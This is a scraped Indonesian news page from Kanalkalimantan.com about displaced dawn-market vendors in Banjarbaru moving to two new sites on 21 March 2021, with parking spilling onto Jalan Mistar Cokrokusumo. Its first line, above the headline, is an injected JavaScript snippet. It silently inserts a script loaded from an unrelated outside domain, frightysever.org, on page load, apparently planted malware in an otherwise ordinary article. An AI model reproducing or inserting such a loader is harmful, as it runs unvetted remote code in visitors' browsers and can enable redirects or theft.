(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Pasar Subuh di Eks Hero Simpang Empat Ramai, Mobil Diparkir di Jalan Utama


KANALKALIMANTAN.COM, BANJARBARU – Drama tiga hari ‘kejar-kejaran’ PKL Subuh eks Pasar Bauntung Banjarbaru yang terkatung-katung tak punya tempat berakhir dengan berpindah pada dua titik lokasi berjualan.

Minggu (21/3/2021), sejak dini hari sekitar pukul 03.00 Wita, para PKL Subuh eks Pasar Bauntung Banjarbaru, punya tempat menggelar lapak-lapak mereka.

Para PKL Subuh terbagi dua titik, ada yang menempati Pasar Pondok Mangga di Kelurahan Loktabat Utara dan di kawasan eks Hero Swalayan, Simpang Empat, Kelurahan Sungai Besar, Banjarbaru Selatan.

Motor di antara pedagang penjual di pasar subuh eks Hero Swalayan, Minggu (21/3/2021). Foto : pras

 

Baca juga: Teken Kontrak Satu Tahun, PKL Subuh Uji Coba 1 Bulan Jualan di Eks Hero Swalayan

Pantauan Kanalkalimantan.com, kawasan eks Hero Swalayan yang berada di Jalan Mistar Cokrokusumo, sudah ditempati pedagang. Ratusan lapak pedagang yang mengelar dagangan berupa sayur-sayuran, ikan segar hingga barang dagangan dapur rempah lainnya.

Pasar pagi di eks Hero Swalayan ini menempati tanah-tanah atau parkir eks Hero Swalayan. Pengunjung pun ramai bertransaksi dengan pedagang di hari pertama.

Setidaknya ada dua sisi yang dipergunakan PKL Subuh menggelar lapaknya, sisi utara dan sisi selatan bangunan Citra Plaza Banjarbaru ini. Ada dua pintu masuk masing-masing di kedua sisi yang tak lebih dari 4 meter, untuk akses ke dalam pasar.

Parkir sepeda motor di pasar subuh eks Hero Swalayan. Foto: pras

“Kami diperbolehkan berjualan di sini dari jam 3 (Subuh, red) sampai jam 12 (siang, red),” aku salah satu pedagang kepada Kanalkalimantan.com.

Sejak pukul 06.00 Wita hingga pukul 08.30 Wita, dari pantauan Kanalkalimantan.com, jalur masuk pengunjung yang mayoritas datang dengan sepeda motor memenuhi area parkir. Hingga tampak berdesakan di antara lapak-lapak pedagang dengan pembeli.

Baca juga: PKL Subuh Akhirnya Punya Lokasi Berjualan, Sewa Lahan eks Hero Swalayan Simpang Empat

Bahkan Jalan Mistarcokrokusumo –akses Banjarbaru ke arah Pelaihari- mendapat luberan parkir kendaraan roda empat, dari kedua sisi. Akibat tidak bisa lagi menampung kendaraan roda empat untuk masuk ke dalam pasar eks Hero Swalayan ini.

“Jelas kita perlu evaluasi, jadi wajar penuh membludak apalagi hari ini hari pertama,” ujar salah satu juru parkir kepada Kanalkalimantan.com, ketika berdiskusi dengan sesama juru parkir lainnya.

Mobil terparkir di Jalan Mistar Cokrokusumo depan eks Hero Swalayan, Minggu (21/3/2021). Foto: pras

Ia juga menambahkan perlu adanya koordinasi dengan pihak PT Dikaka Bhanuwa Jasa sebagai penyedia lahan pemilik kontrak lahan yang dimiliki Pemprov Kalsel ini.

“Ya sekarang kita akan memikirkan ini dengan pengelola pasar, apalagi kita sekarang tidak punya urusan apapun lagi dengan Pemko,” ujarnya.

Sementara ratusan pedagang pasar subuh di eks Hero Swalayan banyak pengunjung dengan berjual beli, hingga parkir sepeda motor dan mobil agak semerawut, sejumlah PKL Subuh lainnya menggelar lapak dagangan di Pasar Pondok Mangga, Kelurahan Loktabat Utara, Kecamatan Banjarbaru Utara.

Kanalkalimantan.com sempat mendatangi Pasar Pondok Mangga pada pukul 05:59 Wita, tak lebih dari 50 PKL Subuh sudah berdatangan hingga 06:44 Wita.

“Kami tadi datang agak siangan, supaya lebih santai. Apalagi pengunjung masih kurang banyak yang datang,” kata Sulasmi (47), seorang pedagang gorengan.

Pedagang yang sudah berjualan 10 tahun di eks Pasar Bauntung ini mengaku agak kecewa karena para pedagang lainnya tidak kompak datang ke Pasar Pondok Mangga.

“Padahal para pedagang sudah deal pindah ke sini, lah sekarang malah pindahnya ke (eks lokasi) Hero,” tutur pedagang yang tinggal di Lianganggang ini.

Untuk saat ini sendiri para PKL Subuh yang datang ke Pasar Pondok Mangga sudah didata oleh petugas dari Dinas Perdagangan Banjarbaru dengan dimintai identitas KTP dan keterangan tambahan. (kanalkalimantan.com/pras)

Reporter : pras
Editor : bie


Al Ghifari

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

6 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

6 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

6 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

7 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

7 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

7 jam ago

This website uses cookies.